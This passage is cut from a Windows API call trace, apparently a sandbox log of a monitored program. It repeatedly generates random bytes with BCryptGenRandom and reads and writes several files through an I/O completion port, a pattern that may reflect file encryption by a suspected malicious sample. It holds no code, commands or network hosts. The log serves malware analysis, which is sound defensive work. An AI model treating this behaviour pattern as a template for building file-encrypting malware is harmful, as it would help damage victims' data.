cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0114.509] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.509] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0114.509] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.510] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.510] free (_Block=0x77d7a8) [0114.510] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.510] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.510] free (_Block=0x2071c20) [0114.510] free (_Block=0x2071d30) [0114.510] free (_Block=0x77d8b0) [0114.510] WriteFile (in: hFile=0x2f4, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0114.510] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.519] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x2b90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0114.520] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.540] ReadFile (in: hFile=0x13c0, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x3690, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0114.548] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.565] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.565] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0114.565] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.566] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0114.566] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.566] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.566] free (_Block=0x77d7a8) [0114.566] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.566] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.567] free (_Block=0x2071c20) [0114.567] free (_Block=0x2071d30) [0114.567] free (_Block=0x77d8b0) [0114.567] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0114.567] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.580] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xa6d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0114.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.588] ReadFile (in: hFile=0x340, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x121a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0114.589] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0115.728] WriteFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0115.729] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0115.740] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.741] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0115.741] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.741] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0115.745] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0115.745] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0115.745] free (_Block=0x77d7a8) [0115.745] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0115.745] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0115.746] free (_Block=0x2071c20) [0115.746] free (_Block=0x2071d30) [0115.746] free (_Block=0x77d8b0) [0115.746] WriteFile (in: hFile=0x13c0, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0115.746] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0115.757] CloseHandle (hObject=0x340) returned 1 [0115.760] free (_Block=0x3e70008) [0115.760] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0115.770] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x284c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0115.778] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0115.785] CloseHandle (hObject=0x3bc) returned 1 [0115.788] free (_Block=0x1ff1e60) [0115.788] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0115.795] WriteFile (in: hFile=0x81c, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x76d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0115.795] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0115.808] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.809] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0115.809] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.809] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0115.810] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0115.810] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0115.810] free (_Block=0x77d7a8) [0115.810] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0115.810] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0115.810] free (_Block=0x2071c20) [0115.810] free (_Block=0x2071d30) [0115.810] free (_Block=0x77d8b0) [0115.810] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0115.811] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0115.820] WriteFile (in: hFile=0x13c0, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x4610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0115.821] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0115.825] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x329e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0115.837] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.094] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x816, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0117.094] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.105] CloseHandle (hObject=0x81c) returned 1 [0117.106] free (_Block=0x3d70450) [0117.106] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.109] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x1d8f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0117.128] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.138] ReadFile (in: hFile=0x2f4, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x18bb, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 1 [0117.146] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.152] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xeb4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0117.152] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.159] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.160] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0117.160] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.160] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0117.160] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.160] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.160] free (_Block=0x77d7a8) [0117.161] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.161] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.161] free (_Block=0x2071c20) [0117.161] free (_Block=0x2071d30) [0117.161] free (_Block=0x77d8b0) [0117.161] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0117.161] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.722] CloseHandle (hObject=0x2f4) returned 1 [0117.724] free (_Block=0x1ff1e60) [0117.724] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.735] CloseHandle (hObject=0x13c0) returned 1 [0117.740] free (_Block=0x3e70008) [0117.740] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.757] CloseHandle (hObject=0x3bc) returned 1 [0117.760] free (_Block=0x3ef0008) [0117.760] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.771] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xe50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0117.771] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.780] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.781] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.792] WriteFile (in: hFile=0x13c0, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0117.792] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.796] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xce2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0117.796] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.797] CloseHandle (hObject=0x3bc) returned 1 [0117.798] free (_Block=0x3ef0008) [0117.798] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.809] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.810] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0117.810] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.810] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0117.810] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.810] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.810] free (_Block=0x77d7a8) [0117.810] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.810] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.811] free (_Block=0x2071c20) [0117.811] free (_Block=0x2071d30) [0117.811] free (_Block=0x77d8b0) [0117.811] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0117.811] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.812] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0117.812] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.842] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3960, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.847] CloseHandle (hObject=0x3bc) returned 1 [0117.850] free (_Block=0x1ff1e60) [0117.850] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.850] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x34f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0117.851] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.880] ReadFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x16a6, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.881] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.894] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xe86, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0117.894] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.907] ReadFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x5bc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0117.907] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.917] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x578, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0117.917] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.955] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.956] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0117.956] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.956] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0117.957] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.957] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.957] free 